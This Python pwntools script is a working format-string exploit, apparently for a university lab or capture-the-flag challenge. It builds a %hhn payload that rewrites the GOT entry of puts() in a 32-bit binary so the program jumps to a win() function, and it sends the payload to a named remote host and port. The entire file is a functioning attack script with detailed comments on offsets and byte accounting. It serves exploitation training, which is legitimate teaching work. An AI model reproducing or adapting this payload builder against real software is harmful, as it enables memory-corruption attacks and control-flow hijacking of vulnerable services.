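from pwn import remote, process, p32, ELF

# Format-string exploit for a 32-bit target: overwrite the GOT entry of puts()
# with the address of win(), one byte at a time via %hhn, so the next call to
# puts() lands in win().
#
# Limitation (unchanged from the original): the payload is consumed as a C
# string, so neither the GOT slot addresses nor the written value may contain
# a NUL byte. print_to_ram() refuses to build such a payload instead of
# silently emitting a truncated one.

# %x on a 32-bit target prints at most 8 hex digits. Keeping every field width
# at or above 8 guarantees that exactly `width` characters are emitted, so the
# running character count (and therefore every %hhn value) stays exact.
MIN_FIELD_WIDTH = 8
PTR_SIZE = 4  # p32() and the %x argument width both assume 4-byte pointers


def print_to_ram(base: int, arg_base: int, data: bytes) -> bytes:
    """Build a format-string payload that writes ``data`` byte-by-byte to ``base``.

    Layout: ``len(data)`` little-endian pointers (``base``, ``base+1``, ...)
    followed by one ``%<width>x%<arg>$hhn`` directive per byte. The pointer
    block is echoed verbatim by the vulnerable printf, so the character count
    starts at ``PTR_SIZE * len(data)``; each directive then pads the count up
    to the wanted byte value (mod 256) before ``%hhn`` stores it.

    Args:
        base: address of the first byte to write (e.g. a GOT slot).
        arg_base: printf argument index at which the first pointer sits on the
            stack (locate it with a ``%08x`` probe, see ``ARG_BASE`` below).
        data: bytes to write; byte ``i`` goes to ``base + i``.

    Returns:
        The payload bytes, without a trailing newline.

    Raises:
        ValueError: if the payload would contain a NUL byte, which would
            truncate it when the target reads it as a C string.
    """
    pointers = [p32(base + i) for i in range(len(data))]
    directives: list[bytes] = []
    # Characters printed so far: the pointer block is echoed as-is.
    cum_chars = PTR_SIZE * len(data)
    for i, byte in enumerate(data):
        # Normalise the difference into 0..255 first. The original computed
        # `byte - (cum_chars % 256)` and added 256 only once, so a difference
        # below -248 ended up with a width under MIN_FIELD_WIDTH (e.g. -250 -> 6),
        # letting a wide %x value desynchronise the count.
        width = (byte - cum_chars) % 256
        # Keep the width large enough that the %x value cannot exceed it, and
        # never 0 (printf would read "%0x" as the zero-pad flag, not a width).
        if width < MIN_FIELD_WIDTH:
            width += 256
        directive = f"%{width}x%{arg_base + i}$hhn"
        print(f"addr={hex(base + i)} byte={hex(byte)} cum_chars={cum_chars}({hex(cum_chars % 256)}) n={width}")
        print(directive)
        directives.append(directive.encode("utf-8"))
        cum_chars += width
    payload = b"".join(pointers) + b"".join(directives)
    if b"\0" in payload:
        raise ValueError("Payload requires a \\0")
    return payload


HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25197
BINARY = "07_call_functions"

# printf argument index at which the start of our input sits on the stack.
# Found by sending a probe such as b"AAAABBBB.%08x.%08x.%08x...\n" and
# looking for 41414141 in the leaked words.
ARG_BASE = 7


def main() -> None:
    """Connect to the target, send the GOT-overwrite payload and echo the reply."""
    elf = ELF(BINARY)
    if elf.bits != 32:
        # p32() and the PTR_SIZE / MIN_FIELD_WIDTH accounting assume 4-byte pointers.
        raise SystemExit(f"{BINARY} is {elf.bits}-bit; this exploit assumes a 32-bit target")
    got_puts = elf.got["puts"]
    win = elf.sym["win"]

    payload = print_to_ram(got_puts, ARG_BASE, p32(win)) + b"\n"
    print(f"Payload: ({len(payload)})", payload, "\n\n")

    conn = remote(HOST, PORT)
    # conn = process(BINARY)  # run against a local copy instead of the remote target
    try:
        conn.send(payload)
        # Echo the target's output byte by byte until it closes the connection;
        # pwntools raises EOFError on the recv that observes the close.
        while conn.connected():
            print(chr(conn.recv(1)[0]), end="", flush=True)
    except EOFError:
        pass
    finally:
        conn.close()


if __name__ == "__main__":
    main()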